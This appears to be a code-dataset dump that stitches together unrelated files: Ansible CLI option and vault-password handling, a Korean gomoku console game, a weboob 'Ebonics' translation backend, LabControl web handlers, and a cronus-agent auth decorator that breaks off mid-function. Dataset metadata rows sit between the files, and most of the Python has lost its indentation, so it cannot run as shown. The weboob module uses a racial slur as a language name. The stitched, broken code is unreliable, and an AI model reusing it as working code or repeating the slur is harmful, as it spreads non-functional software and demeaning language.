# choose the prompt based on --vault-id=prompt or --ask-vault-pass. --ask-vault-pass
# always gets the old format for Tower compatibility.
# ie, we used --ask-vault-pass, so we need to use the old vault password prompt
# format since Tower needs to match on that format.
prompted_vault_secret = PromptVaultSecret(prompt_formats=prompt_formats[vault_id_value],
vault_id=built_vault_id)
                # an empty or invalid password from the prompt will warn and continue to the next
                # without erroring globally
try:
prompted_vault_secret.load()
except AnsibleError as exc:
display.warning('Error in vault password prompt (%s): %s' % (vault_id_name, exc))
raise
vault_secrets.append((built_vault_id, prompted_vault_secret))
# update loader with new secrets incrementally, so we can load a vault password
# that is encrypted with a vault secret provided earlier
loader.set_vault_secrets(vault_secrets)
continue
# assuming anything else is a password file
display.vvvvv('Reading vault password file: %s' % vault_id_value)
# read vault_pass from a file
file_vault_secret = get_file_vault_secret(filename=vault_id_value,
vault_id=vault_id_name,
loader=loader)
# an invalid password file will error globally
try:
file_vault_secret.load()
except AnsibleError as exc:
display.warning('Error in vault password file loading (%s): %s' % (vault_id_name, exc))
raise
if vault_id_name:
vault_secrets.append((vault_id_name, file_vault_secret))
else:
vault_secrets.append((C.DEFAULT_VAULT_IDENTITY, file_vault_secret))
# update loader with as-yet-known vault secrets
loader.set_vault_secrets(vault_secrets)
return vault_secrets
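    # Illustrative sketch (not part of upstream Ansible): a typical call from
    # a CLI subclass, with placeholder identities and file names.
    #
    #   loader = DataLoader()
    #   secrets = CLI.setup_vault_secrets(
    #       loader,
    #       vault_ids=['dev@prompt', 'prod@~/.prod_vault_pass'],
    #       auto_prompt=False)
    #   # -> [('dev', <prompt secret>), ('prod', <file secret>)]; the secrets
    #   #    are also registered on the loader as they are loaded.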
def ask_passwords(self):
''' prompt for connection and become passwords if needed '''
op = self.options
sshpass = None
becomepass = None
become_prompt = ''
become_prompt_method = "BECOME" if C.AGNOSTIC_BECOME_PROMPT else op.become_method.upper()
try:
if op.ask_pass:
sshpass = getpass.getpass(prompt="SSH password: ")
become_prompt = "%s password[defaults to SSH password]: " % become_prompt_method
if sshpass:
sshpass = to_bytes(sshpass, errors='strict', nonstring='simplerepr')
else:
become_prompt = "%s password: " % become_prompt_method
if op.become_ask_pass:
becomepass = getpass.getpass(prompt=become_prompt)
if op.ask_pass and becomepass == '':
becomepass = sshpass
if becomepass:
becomepass = to_bytes(becomepass)
except EOFError:
pass
return (sshpass, becomepass)
def normalize_become_options(self):
''' this keeps backwards compatibility with sudo/su self.options '''
self.options.become_ask_pass = self.options.become_ask_pass or self.options.ask_sudo_pass or self.options.ask_su_pass or C.DEFAULT_BECOME_ASK_PASS
self.options.become_user = self.options.become_user or self.options.sudo_user or self.options.su_user or C.DEFAULT_BECOME_USER
def _dep(which):
display.deprecated('The %s command line option has been deprecated in favor of the "become" command line arguments' % which, '2.6')
if self.options.become:
pass
elif self.options.sudo:
self.options.become = True
self.options.become_method = 'sudo'
_dep('sudo')
elif self.options.su:
self.options.become = True
self.options.become_method = 'su'
_dep('su')
# other deprecations:
if self.options.ask_sudo_pass or self.options.sudo_user:
_dep('sudo')
if self.options.ask_su_pass or self.options.su_user:
_dep('su')
def validate_conflicts(self, vault_opts=False, runas_opts=False, fork_opts=False, vault_rekey_opts=False):
''' check for conflicting options '''
op = self.options
if vault_opts:
# Check for vault related conflicts
if (op.ask_vault_pass and op.vault_password_files):
self.parser.error("--ask-vault-pass and --vault-password-file are mutually exclusive")
if vault_rekey_opts:
if (op.new_vault_id and op.new_vault_password_file):
self.parser.error("--new-vault-password-file and --new-vault-id are mutually exclusive")
if runas_opts:
# Check for privilege escalation conflicts
if ((op.su or op.su_user) and (op.sudo or op.sudo_user) or
(op.su or op.su_user) and (op.become or op.become_user) or
(op.sudo or op.sudo_user) and (op.become or op.become_user)):
self.parser.error("Sudo arguments ('--sudo', '--sudo-user', and '--ask-sudo-pass') and su arguments ('--su', '--su-user', and '--ask-su-pass') "
"and become arguments ('--become', '--become-user', and '--ask-become-pass') are exclusive of each other")
if fork_opts:
if op.forks < 1:
self.parser.error("The number of processes (--forks) must be >= 1")
@staticmethod
def unfrack_paths(option, opt, value, parser):
paths = getattr(parser.values, option.dest)
if paths is None:
paths = []
if isinstance(value, string_types):
paths[:0] = [unfrackpath(x) for x in value.split(os.pathsep) if x]
elif isinstance(value, list):
paths[:0] = [unfrackpath(x) for x in value if x]
else:
pass # FIXME: should we raise options error?
setattr(parser.values, option.dest, paths)
@staticmethod
def unfrack_path(option, opt, value, parser):
if value != '-':
setattr(parser.values, option.dest, unfrackpath(value))
else:
setattr(parser.values, option.dest, value)
@staticmethod
def base_parser(usage="", output_opts=False, runas_opts=False, meta_opts=False, runtask_opts=False, vault_opts=False, module_opts=False,
async_opts=False, connect_opts=False, subset_opts=False, check_opts=False, inventory_opts=False, epilog=None, fork_opts=False,
runas_prompt_opts=False, desc=None, basedir_opts=False, vault_rekey_opts=False):
''' create an options parser for most ansible scripts '''
# base opts
parser = SortedOptParser(usage, version=CLI.version("%prog"), description=desc, epilog=epilog)
parser.add_option('-v', '--verbose', dest='verbosity', default=C.DEFAULT_VERBOSITY, action="count",
help="verbose mode (-vvv for more, -vvvv to enable connection debugging)")
if inventory_opts:
parser.add_option('-i', '--inventory', '--inventory-file', dest='inventory', action="append",
help="specify inventory host path or comma separated host list. --inventory-file is deprecated")
parser.add_option('--list-hosts', dest='listhosts', action='store_true',
help='outputs a list of matching hosts; does not execute anything else')
parser.add_option('-l', '--limit', default=C.DEFAULT_SUBSET, dest='subset',
help='further limit selected hosts to an additional pattern')
if module_opts:
parser.add_option('-M', '--module-path', dest='module_path', default=None,
help="prepend colon-separated path(s) to module library (default=%s)" % C.DEFAULT_MODULE_PATH,
action="callback", callback=CLI.unfrack_paths, type='str')
if runtask_opts:
parser.add_option('-e', '--extra-vars', dest="extra_vars", action="append",
help="set additional variables as key=value or YAML/JSON, if filename prepend with @", default=[])
if fork_opts:
parser.add_option('-f', '--forks', dest='forks', default=C.DEFAULT_FORKS, type='int',
help="specify number of parallel processes to use (default=%s)" % C.DEFAULT_FORKS)
if vault_opts:
parser.add_option('--ask-vault-pass', default=C.DEFAULT_ASK_VAULT_PASS, dest='ask_vault_pass', action='store_true',
help='ask for vault password')
parser.add_option('--vault-password-file', default=[], dest='vault_password_files',
help="vault password file", action="callback", callback=CLI.unfrack_paths, type='string')
parser.add_option('--vault-id', default=[], dest='vault_ids', action='append', type='string',
help='the vault identity to use')
if vault_rekey_opts:
parser.add_option('--new-vault-password-file', default=None, dest='new_vault_password_file',
help="new vault password file for rekey", action="callback", callback=CLI.unfrack_path, type='string')
parser.add_option('--new-vault-id', default=None, dest='new_vault_id', type='string',
help='the new vault identity to use for rekey')
if subset_opts:
parser.add_option('-t', '--tags', dest='tags', default=C.TAGS_RUN, action='append',
help="only run plays and tasks tagged with these values")
parser.add_option('--skip-tags', dest='skip_tags', default=C.TAGS_SKIP, action='append',
help="only run plays and tasks whose tags do not match these values")
if output_opts:
parser.add_option('-o', '--one-line', dest='one_line', action='store_true',
help='condense output')
parser.add_option('-t', '--tree', dest='tree', default=None,
help='log output to this directory')
if connect_opts:
connect_group = optparse.OptionGroup(parser, "Connection Options", "control as whom and how to connect to hosts")
connect_group.add_option('-k', '--ask-pass', default=C.DEFAULT_ASK_PASS, dest='ask_pass', action='store_true',
help='ask for connection password')
connect_group.add_option('--private-key', '--key-file', default=C.DEFAULT_PRIVATE_KEY_FILE, dest='private_key_file',
help='use this file to authenticate the connection', action="callback", callback=CLI.unfrack_path, type='string')
connect_group.add_option('-u', '--user', default=C.DEFAULT_REMOTE_USER, dest='remote_user',
help='connect as this user (default=%s)' % C.DEFAULT_REMOTE_USER)
connect_group.add_option('-c', '--connection', dest='connection', default=C.DEFAULT_TRANSPORT,
help="connection type to use (default=%s)" % C.DEFAULT_TRANSPORT)
connect_group.add_option('-T', '--timeout', default=C.DEFAULT_TIMEOUT, type='int', dest='timeout',
help="override the connection timeout in seconds (default=%s)" % C.DEFAULT_TIMEOUT)
connect_group.add_option('--ssh-common-args', default='', dest='ssh_common_args',
help="specify common arguments to pass to sftp/scp/ssh (e.g. ProxyCommand)")
connect_group.add_option('--sftp-extra-args', default='', dest='sftp_extra_args',
help="specify extra arguments to pass to sftp only (e.g. -f, -l)")
connect_group.add_option('--scp-extra-args', default='', dest='scp_extra_args',
help="specify extra arguments to pass to scp only (e.g. -l)")
connect_group.add_option('--ssh-extra-args', default='', dest='ssh_extra_args',
help="specify extra arguments to pass to ssh only (e.g. -R)")
parser.add_option_group(connect_group)
runas_group = None
rg = optparse.OptionGroup(parser, "Privilege Escalation Options", "control how and which user you become as on target hosts")
if runas_opts:
runas_group = rg
# priv user defaults to root later on to enable detecting when this option was given here
runas_group.add_option("-s", "--sudo", default=C.DEFAULT_SUDO, action="store_true", dest='sudo',
help="run operations with sudo (nopasswd) (deprecated, use become)")
runas_group.add_option('-U', '--sudo-user', dest='sudo_user', default=None,
help='desired sudo user (default=root) (deprecated, use become)')
runas_group.add_option('-S', '--su', default=C.DEFAULT_SU, action='store_true',
help='run operations with su (deprecated, use become)')
runas_group.add_option('-R', '--su-user', default=None,
help='run operations with su as this user (default=%s) (deprecated, use become)' % C.DEFAULT_SU_USER)
# consolidated privilege escalation (become)
runas_group.add_option("-b", "--become", default=C.DEFAULT_BECOME, action="store_true", dest='become',
help="run operations with become (does not imply password prompting)")
runas_group.add_option('--become-method', dest='become_method', default=C.DEFAULT_BECOME_METHOD, type='choice', choices=C.BECOME_METHODS,
help="privilege escalation method to use (default=%s), valid choices: [ %s ]" %
(C.DEFAULT_BECOME_METHOD, ' | '.join(C.BECOME_METHODS)))
runas_group.add_option('--become-user', default=None, dest='become_user', type='string',
help='run operations as this user (default=%s)' % C.DEFAULT_BECOME_USER)
if runas_opts or runas_prompt_opts:
if not runas_group:
runas_group = rg
runas_group.add_option('--ask-sudo-pass', default=C.DEFAULT_ASK_SUDO_PASS, dest='ask_sudo_pass', action='store_true',
help='ask for sudo password (deprecated, use become)')
runas_group.add_option('--ask-su-pass', default=C.DEFAULT_ASK_SU_PASS, dest='ask_su_pass', action='store_true',
help='ask for su password (deprecated, use become)')
runas_group.add_option('-K', '--ask-become-pass', default=False, dest='become_ask_pass', action='store_true',
help='ask for privilege escalation password')
if runas_group:
parser.add_option_group(runas_group)
if async_opts:
parser.add_option('-P', '--poll', default=C.DEFAULT_POLL_INTERVAL, type='int', dest='poll_interval',
help="set the poll interval if using -B (default=%s)" % C.DEFAULT_POLL_INTERVAL)
parser.add_option('-B', '--background', dest='seconds', type='int', default=0,
help='run asynchronously, failing after X seconds (default=N/A)')
if check_opts:
parser.add_option("-C", "--check", default=False, dest='check', action='store_true',
help="don't make any changes; instead, try to predict some of the changes that may occur")
parser.add_option('--syntax-check', dest='syntax', action='store_true',
help="perform a syntax check on the playbook, but do not execute it")
parser.add_option("-D", "--diff", default=C.DIFF_ALWAYS, dest='diff', action='store_true',
help="when changing (small) files and templates, show the differences in those files; works great with --check")
if meta_opts:
parser.add_option('--force-handlers', default=C.DEFAULT_FORCE_HANDLERS, dest='force_handlers', action='store_true',
help="run handlers even if a task fails")
parser.add_option('--flush-cache', dest='flush_cache', action='store_true',
help="clear the fact cache for every host in inventory")
if basedir_opts:
parser.add_option('--playbook-dir', default=None, dest='basedir', action='store',
help="Since this tool does not use playbooks, use this as a subsitute playbook directory."
"This sets the relative path for many features including roles/ group_vars/ etc.")
return parser
@abstractmethod
def parse(self):
"""Parse the command line args
This method parses the command line arguments. It uses the parser
stored in the self.parser attribute and saves the args and options in
self.args and self.options respectively.
Subclasses need to implement this method. They will usually create
a base_parser, add their own options to the base_parser, and then call
this method to do the actual parsing. An implementation will look
something like this::
def parse(self):
parser = super(MyCLI, self).base_parser(usage="My Ansible CLI", inventory_opts=True)
parser.add_option('--my-option', dest='my_option', action='store')
self.parser = parser
super(MyCLI, self).parse()
# If some additional transformations are needed for the
# arguments and options, do it here.
"""
self.options, self.args = self.parser.parse_args(self.args[1:])
# process tags
if hasattr(self.options, 'tags') and not self.options.tags:
# optparse defaults does not do what's expected
self.options.tags = ['all']
if hasattr(self.options, 'tags') and self.options.tags:
if not C.MERGE_MULTIPLE_CLI_TAGS:
if len(self.options.tags) > 1:
display.deprecated('Specifying --tags multiple times on the command line currently uses the last specified value. '
'In 2.4, values will be merged instead. Set merge_multiple_cli_tags=True in ansible.cfg to get this behavior now.',
version=2.5, removed=False)
self.options.tags = [self.options.tags[-1]]
tags = set()
for tag_set in self.options.tags:
for tag in tag_set.split(u','):
tags.add(tag.strip())
self.options.tags = list(tags)
# process skip_tags
if hasattr(self.options, 'skip_tags') and self.options.skip_tags:
if not C.MERGE_MULTIPLE_CLI_TAGS:
if len(self.options.skip_tags) > 1:
display.deprecated('Specifying --skip-tags multiple times on the command line currently uses the last specified value. '
'In 2.4, values will be merged instead. Set merge_multiple_cli_tags=True in ansible.cfg to get this behavior now.',
version=2.5, removed=False)
self.options.skip_tags = [self.options.skip_tags[-1]]
skip_tags = set()
for tag_set in self.options.skip_tags:
for tag in tag_set.split(u','):
skip_tags.add(tag.strip())
self.options.skip_tags = list(skip_tags)
# process inventory options except for CLIs that require their own processing
if hasattr(self.options, 'inventory') and not self.SKIP_INVENTORY_DEFAULTS:
if self.options.inventory:
# should always be list
if isinstance(self.options.inventory, string_types):
self.options.inventory = [self.options.inventory]
# Ensure full paths when needed
self.options.inventory = [unfrackpath(opt, follow=False) if ',' not in opt else opt for opt in self.options.inventory]
else:
self.options.inventory = C.DEFAULT_HOST_LIST
@staticmethod
def version(prog):
''' return ansible version '''
result = "{0} {1}".format(prog, __version__)
gitinfo = CLI._gitinfo()
if gitinfo:
result = result + " {0}".format(gitinfo)
result += "\n config file = %s" % C.CONFIG_FILE
if C.DEFAULT_MODULE_PATH is None:
cpath = "Default w/o overrides"
else:
cpath = C.DEFAULT_MODULE_PATH
result = result + "\n configured module search path = %s" % cpath
result = result + "\n ansible python module location = %s" % ':'.join(ansible.__path__)
result = result + "\n executable location = %s" % sys.argv[0]
result = result + "\n python version = %s" % ''.join(sys.version.splitlines())
return result
@staticmethod
def version_info(gitinfo=False):
''' return full ansible version info '''
if gitinfo:
            # expensive call, use with care
ansible_version_string = CLI.version('')
else:
ansible_version_string = __version__
ansible_version = ansible_version_string.split()[0]
ansible_versions = ansible_version.split('.')
for counter in range(len(ansible_versions)):
if ansible_versions[counter] == "":
ansible_versions[counter] = 0
try:
ansible_versions[counter] = int(ansible_versions[counter])
except Exception:
pass
if len(ansible_versions) < 3:
for counter in range(len(ansible_versions), 3):
ansible_versions.append(0)
return {'string': ansible_version_string.strip(),
'full': ansible_version,
'major': ansible_versions[0],
'minor': ansible_versions[1],
'revision': ansible_versions[2]}
@staticmethod
def _git_repo_info(repo_path):
''' returns a string containing git branch, commit id and commit date '''
result = None
if os.path.exists(repo_path):
# Check if the .git is a file. If it is a file, it means that we are in a submodule structure.
if os.path.isfile(repo_path):
try:
gitdir = yaml.safe_load(open(repo_path)).get('gitdir')
# There is a possibility the .git file to have an absolute path.
if os.path.isabs(gitdir):
repo_path = gitdir
else:
repo_path = os.path.join(repo_path[:-4], gitdir)
except (IOError, AttributeError):
return ''
f = open(os.path.join(repo_path, "HEAD"))
line = f.readline().rstrip("\n")
if line.startswith("ref:"):
branch_path = os.path.join(repo_path, line[5:])
else:
branch_path = None
f.close()
if branch_path and os.path.exists(branch_path):
branch = '/'.join(line.split('/')[2:])
f = open(branch_path)
commit = f.readline()[:10]
f.close()
else:
# detached HEAD
commit = line[:10]
branch = 'detached HEAD'
branch_path = os.path.join(repo_path, "HEAD")
date = time.localtime(os.stat(branch_path).st_mtime)
if time.daylight == 0:
offset = time.timezone
else:
offset = time.altzone
result = "({0} {1}) last updated {2} (GMT {3:+04d})".format(branch, commit, time.strftime("%Y/%m/%d %H:%M:%S", date), int(offset / -36))
else:
result = ''
return result
@staticmethod
def _gitinfo():
basedir = os.path.join(os.path.dirname(__file__), '..', '..', '..')
repo_path = os.path.join(basedir, '.git')
result = CLI._git_repo_info(repo_path)
submodules = os.path.join(basedir, '.gitmodules')
if not os.path.exists(submodules):
return result
f = open(submodules)
for line in f:
tokens = line.strip().split(' ')
if tokens[0] == 'path':
submodule_path = tokens[2]
submodule_info = CLI._git_repo_info(os.path.join(basedir, submodule_path, '.git'))
if not submodule_info:
submodule_info = ' not found - use git submodule update --init ' + submodule_path
result += "\n {0}: {1}".format(submodule_path, submodule_info)
f.close()
return result
def pager(self, text):
''' find reasonable way to display text '''
# this is a much simpler form of what is in pydoc.py
if not sys.stdout.isatty():
display.display(text, screen_only=True)
elif 'PAGER' in os.environ:
if sys.platform == 'win32':
display.display(text, screen_only=True)
else:
self.pager_pipe(text, os.environ['PAGER'])
else:
p = subprocess.Popen('less --version', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate()
if p.returncode == 0:
self.pager_pipe(text, 'less')
else:
display.display(text, screen_only=True)
@staticmethod
def pager_pipe(text, cmd):
''' pipe text through a pager '''
if 'LESS' not in os.environ:
os.environ['LESS'] = CLI.LESS_OPTS
try:
cmd = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=sys.stdout)
cmd.communicate(input=to_bytes(text))
except IOError:
pass
except KeyboardInterrupt:
pass
@classmethod
def tty_ify(cls, text):
t = cls._ITALIC.sub("`" + r"\1" + "'", text) # I(word) => `word'
t = cls._BOLD.sub("*" + r"\1" + "*", t) # B(word) => *word*
t = cls._MODULE.sub("[" + r"\1" + "]", t) # M(word) => [word]
t = cls._URL.sub(r"\1", t) # U(word) => word
t = cls._CONST.sub("`" + r"\1" + "'", t) # C(word) => `word'
return t
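    # Worked example of the substitutions above (illustrative input, based on the
    # inline comments): documentation markup such as
    #   "B(bold) I(italic) M(module) U(http://example.com) C(CONST)"
    # is rendered for the terminal as
    #   "*bold* `italic' [module] http://example.com `CONST'"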
@staticmethod
def _play_prereqs(options):
# all needs loader
loader = DataLoader()
basedir = getattr(options, 'basedir', False)
if basedir:
loader.set_basedir(basedir)
vault_ids = options.vault_ids
default_vault_ids = C.DEFAULT_VAULT_IDENTITY_LIST
vault_ids = default_vault_ids + vault_ids
vault_secrets = CLI.setup_vault_secrets(loader,
vault_ids=vault_ids,
vault_password_files=options.vault_password_files,
ask_vault_pass=options.ask_vault_pass,
auto_prompt=False)
loader.set_vault_secrets(vault_secrets)
# create the inventory, and filter it based on the subset specified (if any)
inventory = InventoryManager(loader=loader, sources=options.inventory)
# create the variable manager, which will be shared throughout
# the code, ensuring a consistent view of global variables
variable_manager = VariableManager(loader=loader, inventory=inventory)
if hasattr(options, 'basedir'):
if options.basedir:
variable_manager.safe_basedir = True
else:
variable_manager.safe_basedir = True
# load vars from cli options
variable_manager.extra_vars = load_extra_vars(loader=loader, options=options)
variable_manager.options_vars = load_options_vars(options, CLI.version_info(gitinfo=False))
return loader, inventory, variable_manager
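    # Illustrative call site (not part of this class): CLI subcommands are expected
    # to unpack the three objects returned above, e.g.
    #   loader, inventory, variable_manager = CLI._play_prereqs(self.options)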
@staticmethod
def get_host_list(inventory, subset, pattern='all'):
no_hosts = False
if len(inventory.list_hosts()) == 0:
# Empty inventory
if C.LOCALHOST_WARNING:
display.warning("provided hosts list is empty, only localhost is available. Note that the implicit localhost does not match 'all'")
no_hosts = True
inventory.subset(subset)
hosts = inventory.list_hosts(pattern)
if len(hosts) == 0 and no_hosts is False:
raise AnsibleError("Specified hosts and/or --limit does not match any hosts")
return hosts
| gpl-3.0 | -3,480,482,311,501,332,000 | 46.972422 | 160 | 0.573721 | false | 4.246338 | false | false | false |
3people/dropship_project | code/Dmok.py | 1 | 5356 | import os
class Board:
SIZE = 15
def __init__(self):
self.board = [['+' for _ in range(self.SIZE)] for _ in range(self.SIZE)]
self.player1 = input("player1의 이름을 입력하시오 : ")
self.player2 = input("player2의 이름을 입력하시오 : ")
self.startgame()
def printboard(self):
"""Print board
"""
os.system("clear")
print(" "+"".join(str(x+1).center(3) for x in range(self.SIZE)))
for x in range(self.SIZE):
print(str(x+1).rjust(2), end = " ")
for y in range(self.SIZE):
print(str(self.board[x][y]).center(3), end="" if y < self.SIZE-1 else "\n")
def startgame(self):
self.board[self.SIZE//2][self.SIZE//2] = "●"
self.printboard()
while True:
while True:
y = int(input(self.player2+"의 x좌표를 입력하시오 : "))
x = int(input(self.player2+"의 y좌표를 입력하시오 : "))
if x in range(1,self.SIZE+1) and y in range(1,self.SIZE+1) and self.board[x-1][y-1] == "+":
break
else :
print("다시입력하세요")
self.board[x-1][y-1] = "○"
self.printboard()
if self.check(x-1,y-1,"○"):
print(self.player2+" win")
                break
while True:
y = int(input(self.player1+"의 x좌표를 입력하시오 : "))
x = int(input(self.player1+"의 y좌표를 입력하시오 : "))
if self.check33(x-1, y-1) :
print("쌍삼입니다\n다시입력하세요")
elif x in range(1,self.SIZE+1) and y in range(1,self.SIZE+1) and self.board[x-1][y-1] == "+":
break
else :
print("다시입력하세요")
self.board[x-1][y-1] = "●"
self.printboard()
if self.check(x-1,y-1,"●"):
print(self.player1+" win")
                break
def check33(self, x, y):
a = []
for n in range(1,5):
a.append(eval("self.check"+str(n)+"("+str(x)+","+str(y)+",\"●\")"))
if a.count(3) >= 2 or a.count(4) >= 2:
return True
else :
return False
def check(self, x, y, mark):
a = []
for n in range(1,5):
a.append(eval("self.check"+str(n)+"("+str(x)+","+str(y)+",\""+mark+"\")"))
if 5 in a or (mark == "○" and True in [x >= 6 for x in a]):
return True
else :
return False
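    # Note on the two methods above (added explanation): check1..check4 count the
    # consecutive stones through (x, y) in the four board directions, and eval()
    # merely builds the call "self.checkN(x, y, mark)". A run of exactly five wins
    # for either colour; the extra condition lets "○" also win with an overline of
    # six or more stones, while check33 rejects double-three/double-four moves.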
def check1(self, x, y, mark, d = 0):
"""Check row direction.
"""
if x in range(self.SIZE) and y in range(self.SIZE):
if d == 0:
return 1 + self.check1(x-1, y, mark, 1) + self.check1(x+1, y, mark, -1)
elif d == 1:
if self.board[x][y] == mark:
return 1 + self.check1(x-1, y, mark, 1)
else :
return 0
elif d == -1:
if self.board[x][y] == mark:
return 1 + self.check1(x+1, y, mark, -1)
else :
return 0
else :
return 0
def check2(self, x, y, mark, d = 0):
"""Check column diretion.
"""
if x in range(self.SIZE) and y in range(self.SIZE):
if d == 0:
return 1 + self.check2(x, y+1, mark, 1) + self.check2(x, y-1, mark, -1)
elif d == 1:
if self.board[x][y] == mark:
return 1 + self.check2(x, y+1, mark, 1)
else :
return 0
elif d == -1:
if self.board[x][y] == mark:
return 1 + self.check2(x, y-1, mark, -1)
else :
return 0
else :
return 0
def check3(self, x, y, mark, d = 0):
"""Check left diagonal direction.
"""
if x in range(self.SIZE) and y in range(self.SIZE):
if d == 0:
return 1 + self.check3(x-1, y-1, mark, 1) + self.check3(x+1, y+1, mark, -1)
elif d == 1:
if self.board[x][y] == mark:
return 1 + self.check3(x-1, y-1, mark, 1)
else :
return 0
elif d == -1:
if self.board[x][y] == mark:
return 1 + self.check3(x+1, y+1, mark, -1)
else :
return 0
else :
return 0
def check4(self, x, y, mark, d = 0):
"""Check right diagonal direction.
"""
if x in range(self.SIZE) and y in range(self.SIZE):
if d == 0:
return 1 + self.check4(x-1, y+1, mark, 1) + self.check4(x+1, y-1, mark, -1)
elif d == 1:
if self.board[x][y] == mark:
return 1 + self.check4(x-1, y+1, mark, 1)
else :
return 0
elif d == -1:
if self.board[x][y] == mark:
return 1 + self.check4(x+1, y-1, mark, -1)
else :
return 0
else :
return 0
b = Board()
| mit | -7,690,093,707,582,379,000 | 34.013514 | 109 | 0.412582 | false | 3.106715 | false | false | false |
eirmag/weboob | modules/ebonics/backend.py | 1 | 2047 | # -*- coding: utf-8 -*-
# Copyright(C) 2012 Romain Bignon
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import urllib
from weboob.capabilities.translate import ICapTranslate, Translation, TranslationFail, LanguageNotSupported
from weboob.tools.backend import BaseBackend
from weboob.tools.browser import StandardBrowser
__all__ = ['EbonicsBackend']
class EbonicsBackend(BaseBackend, ICapTranslate):
NAME = 'ebonics'
MAINTAINER = u'Romain Bignon'
EMAIL = '[email protected]'
VERSION = '0.e'
LICENSE = 'AGPLv3+'
DESCRIPTION = u'English to Ebonics translation service'
BROWSER = StandardBrowser
def translate(self, lan_from, lan_to, text):
if lan_from != 'English' or lan_to != 'Nigger!':
raise LanguageNotSupported()
with self.browser:
data = {'English': text.encode('utf-8')}
doc = self.browser.location('http://joel.net/EBONICS/Translator', urllib.urlencode(data))
try:
text = doc.getroot().cssselect('div.translateform div.bubble1 div.bubblemid')[0].text
except IndexError:
raise TranslationFail()
if text is None:
raise TranslationFail()
translation = Translation(0)
translation.lang_src = unicode(lan_from)
translation.lang_dst = unicode(lan_to)
translation.text = unicode(text).strip()
return translation
| agpl-3.0 | 4,084,087,417,472,269,000 | 33.116667 | 107 | 0.686859 | false | 3.959381 | false | false | false |
jdereus/labman | labcontrol/gui/handlers/study.py | 1 | 2270 | # ----------------------------------------------------------------------------
# Copyright (c) 2017-, LabControl development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from tornado.web import authenticated, HTTPError
from tornado.escape import json_encode
from labcontrol.gui.handlers.base import BaseHandler
from labcontrol.db.study import Study
from labcontrol.db.exceptions import LabControlUnknownIdError
class StudyListingHandler(BaseHandler):
@authenticated
def get(self):
self.render('study_list.html')
class StudyListHandler(BaseHandler):
@authenticated
def get(self):
# Get all arguments that DataTables send us
res = {"data": [
[s['study_id'], s['study_title'], s['study_alias'], s['owner'],
s['num_samples']] for s in Study.list_studies()]}
self.write(res)
self.finish()
class StudyHandler(BaseHandler):
@authenticated
def get(self, study_id):
try:
study = Study(int(study_id))
self.write({'study_id': study.id,
'study_title': study.title,
'total_samples': study.num_samples})
except LabControlUnknownIdError:
self.set_status(404)
self.finish()
class StudySamplesHandler(BaseHandler):
@authenticated
def get(self, study_id):
try:
study = Study(int(study_id))
term = self.get_argument('term', None)
res = list(study.samples(term, limit=20))
self.write(json_encode(res))
except LabControlUnknownIdError:
self.set_status(404)
self.finish()
class StudySummaryHandler(BaseHandler):
@authenticated
def get(self, study_id):
try:
study = Study(int(study_id))
except LabControlUnknownIdError:
raise HTTPError(404, reason="Study %s doesn't exist" % study_id)
study_numbers = study.sample_numbers_summary
self.render('study.html', study_id=study.id,
study_title=study.title, study_numbers=study_numbers)
| bsd-3-clause | -1,625,448,089,754,203,400 | 31.428571 | 78 | 0.586784 | false | 4.180479 | false | false | false |
eBay/cronus-agent | agent/agent/lib/security/agentauth.py | 1 | 5600 | #pylint: disable=E1121,W0105
'''
Copyright 2014 eBay Software Foundation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
Created on Feb 21, 2014
@author: biyu
'''
from agent.lib.security import UnauthorizedException, invalidAuthHandler
from pylons import request, config
import logging
import re
import base64
from decorator import decorator
from agent.lib import configutil, manifestutil
import os
import traceback
LOG = logging.getLogger(__name__)
def authorize():
'''
    decorator for authorize
    @parameter inSecurity: bool indicating whether incoming security needs to be checked
'''
def validate(func, self, *args, **kwargs):
''' function that calls authrozing function'''
isAuthEnabled = True
isPkiEnabled = False
authPassed = False
try:
appGlobal = config['pylons.app_globals']
isAuthEnabled = configutil.getConfigAsBool('basicauth.local')
isPkiEnabled = (appGlobal.encryptedtokens and configutil.getConfigAsBool('pkiauth_enabled'))
except BaseException as excep:
LOG.error('Error loading auth config %s - %s' % (str(excep), traceback.format_exc(2)))
if isAuthEnabled:
if 'Authorization' not in request.headers and 'authorization' not in request.headers:
return invalidAuthHandler('Authorization header missing', {})
message = None
result = {}
# base authentication
if not isPkiEnabled:
token = ('%s:%s' % (configutil.getConfig('username.local'), configutil.getConfig('password.local')))
try:
isAuthenticated(token)
authPassed = True
except UnauthorizedException:
message = 'Please provide valid username and password'
result['scheme'] = 'base'
if not authPassed:
# pki authentication
token = appGlobal.authztoken
try:
isAuthenticated(token)
authPassed = True
except UnauthorizedException:
if isPkiEnabled:
result['scheme'] = 'pki'
user = request.headers['AuthorizationUser'] if 'AuthorizationUser' in request.headers else 'agent'
pubKey = '%s.cert' % user
if pubKey in appGlobal.encryptedtokens:
message = appGlobal.encryptedtokens[pubKey]
result['key'] = appGlobal.encryptedtokens[pubKey]
else:
                        message = 'Unknown AuthorizationUser %s' % user
return invalidAuthHandler(message, result)
return func(self, *args, **kwargs)
return decorator(validate)
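# Illustrative usage only -- the controller and method names below are hypothetical
# and not taken from this module. The decorator is intended to wrap Pylons
# controller actions so every request is checked for basic-auth or PKI credentials:
#
#     class ManifestController(BaseController):
#         @authorize()
#         def post(self, service):
#             ...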
def isAuthenticated(token):
''' check whether user name and password are right '''
message = 'Please provide valid username and password'
inHeader = None
try:
if 'authorization' in request.headers:
inHeader = request.headers['authorization']
elif 'Authorization' in request.headers:
inHeader = request.headers['Authorization']
if inHeader is not None:
base64string = base64.encodestring(token)[:-1]
